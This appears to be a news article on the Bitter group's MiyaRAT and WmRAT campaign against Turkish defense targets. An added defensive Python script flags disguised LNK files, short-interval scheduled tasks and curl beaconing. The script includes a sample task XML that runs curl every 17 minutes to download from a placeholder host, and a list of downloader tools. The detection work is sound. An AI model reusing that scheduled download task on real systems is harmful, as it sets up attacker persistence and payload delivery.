A cyberespionage threat group commonly known as 'Bitter' was observed targeting defense organizations in Turkey using a novel malware family named MiyaRAT.
MiyaRAT is used alongside the WmRAT malware, a cyberespionage tool previously attributed to Bitter.
Proofpoint discovered the campaign and reports that the new malware is likely reserved for high-value targets, deployed only sporadically.
Bitter is a suspected South Asian cyberespionage threat group active since 2013, targeting government and critical organizations in Asia.
In 2022, Cisco Talos observed the group in attacks against the Bangladeshi government, using a remote code execution flaw in Microsoft Office to drop trojans.
Last year, Intezer reported that Bitter was impersonating the Embassy of Kyrgyzstan in Beijing in phishing attacks targeting several Chinese nuclear energy companies and academics.
Abusing alternate knowledge streams
The attacks in Turkey began with an email containing a foreign investment project lure, with a RAR archive attached.
The archive contains a decoy PDF file (~tmp.pdf), a shortcut file disguised as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and alternate data streams (ADS) embedded in the RAR file named "Participation" and "Zone.Identifier."
If the recipient opens the LNK file, it triggers execution of PowerShell code hidden in the ADS, which opens the legitimate decoy PDF as a distraction. At the same time, it creates a scheduled task named "DsSvcCleanup" that runs a malicious curl command every 17 minutes.
The command reaches out to a staging domain (jacknwoods[.]com) and awaits responses such as instructions to download additional payloads, perform network reconnaissance, or steal data.
Proofpoint reports that in the attack they examined, a command to fetch WmRAT (anvrsa.msi) was served within 12 hours.
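The delivery chain above leaves three artifacts a defender can check for without the malware itself: an archive member whose name ends in a document extension followed by .lnk, a scheduled task that repeats at a short fixed interval and whose action is a download tool such as curl or PowerShell, and a series of curl process launches spaced a near-constant number of minutes apart. The following Python is an added example written for this article, not Proofpoint's code or tooling. It parses the Task Scheduler XML format that Windows writes for registered tasks (and that Security event 4698 embeds), including its ISO 8601 repetition intervals, and runs the three checks over constructed sample data; the archive member names are the ones the report gives, while the task XML, the staging URL (a .invalid placeholder) and the timestamps are made up for illustration.

```python
"""Detection heuristics for the lure -> LNK -> scheduled curl beacon chain.

Added example, not part of the original report. All sample data is constructed.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime

# Document extensions an attacker might chain in front of .lnk (the lure used .pdf.lnk).
DOC_LIKE = ("pdf", "doc", "docx", "xls", "xlsx", "txt")
DISGUISED_LNK = re.compile(r"\.(%s)\.lnk$" % "|".join(DOC_LIKE), re.IGNORECASE)
# Living-off-the-land download tools worth flagging as a scheduled-task action.
DOWNLOADERS = ("curl", "powershell", "pwsh", "certutil", "bitsadmin")
# Default namespace of Windows Task Scheduler task definitions.
TS_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed samples: the member names are from the report, the rest is made up.
SAMPLE_ARCHIVE_MEMBERS = ["~tmp.pdf", "PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk"]
SAMPLE_TASK_XML = """
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT17M</Interval></Repetition>
      <StartBoundary>2024-11-18T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>curl.exe</Command>
      <Arguments>-s https://staging.example.invalid/task -o %TEMP%\\out.bin</Arguments>
    </Exec>
  </Actions>
</Task>
"""
SAMPLE_CURL_TIMES = [  # constructed process-creation times for curl.exe on one host
    "2024-11-18T09:00:02", "2024-11-18T09:17:01", "2024-11-18T09:34:03",
    "2024-11-18T09:51:02", "2024-11-18T10:08:01",
]


def find_disguised_shortcuts(member_names):
    """Archive members named <something>.<doc extension>.lnk."""
    return [n for n in member_names if DISGUISED_LNK.search(n)]


def parse_iso_duration_minutes(text):
    """Minimal parser for the PnDTnHnMnS duration form Task Scheduler uses; None if malformed."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text or "")
    if not m:
        return None
    days, hours, mins, secs = (int(g) if g else 0 for g in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def analyse_task_xml(xml_text, max_interval_minutes=60):
    """Findings for a task that repeats at most every max_interval_minutes or runs a downloader."""
    root = ET.fromstring(xml_text)
    findings = []
    for interval in root.iter(TS_NS + "Interval"):
        minutes = parse_iso_duration_minutes(interval.text)
        if minutes is not None and minutes <= max_interval_minutes:
            findings.append("repeats every %g minutes" % minutes)
    for exec_node in root.iter(TS_NS + "Exec"):
        cmd = (exec_node.findtext(TS_NS + "Command") or "").lower()
        args = exec_node.findtext(TS_NS + "Arguments") or ""
        if any(tool in cmd for tool in DOWNLOADERS):
            findings.append("action runs %s %s" % (cmd, args))
    return findings


def beacon_interval_minutes(timestamps, tolerance_minutes=1.0):
    """If gaps between consecutive launches are near-constant, return that gap in minutes."""
    ts = sorted(datetime.fromisoformat(t) for t in timestamps)
    if len(ts) < 3:
        return None
    gaps = [(b - a).total_seconds() / 60 for a, b in zip(ts, ts[1:])]
    median = sorted(gaps)[len(gaps) // 2]
    if all(abs(g - median) <= tolerance_minutes for g in gaps):
        return round(median, 1)
    return None


def run_sample():
    """Run all three checks over the constructed samples."""
    return {
        "disguised_shortcuts": find_disguised_shortcuts(SAMPLE_ARCHIVE_MEMBERS),
        "task_findings": analyse_task_xml(SAMPLE_TASK_XML),
        "beacon_minutes": beacon_interval_minutes(SAMPLE_CURL_TIMES),
    }


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(key, "->", value)
```

In practice the archive listing would come from an email gateway or sandbox, the task XML from the task registration event or from C:\Windows\System32\Tasks, and the timestamps from Sysmon or 4688 process-creation logs filtered to curl.exe; the interval tolerance absorbs the jitter of task start times. A 17-minute beacon to a domain that does not appear on an allowlist, combined with the task name and the IoCs Proofpoint publishes, is the kind of correlation a SOC rule for this chain would be built on.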
The WmRAT and MiyaRAT malware
Bitter first deployed WmRAT on the target, but when it failed to establish communication with the command and control server, it downloaded MiyaRAT (gfxview.msi).
Both are C++ remote access trojans (RATs) that give Bitter data exfiltration, remote control, screenshot capture, command execution (CMD or PowerShell), and system monitoring capabilities.
MiyaRAT is newer and generally more sophisticated, featuring more advanced data and communications encryption, an interactive reverse shell, and enhanced directory and file management.
Its more selective deployment by Bitter may indicate that the threat actors reserve it for high-value targets, minimizing its exposure to analysts.
Indicators of compromise (IoCs) associated with this attack are listed at the bottom of Proofpoint's report, while a YARA rule to help detect the threat is available here.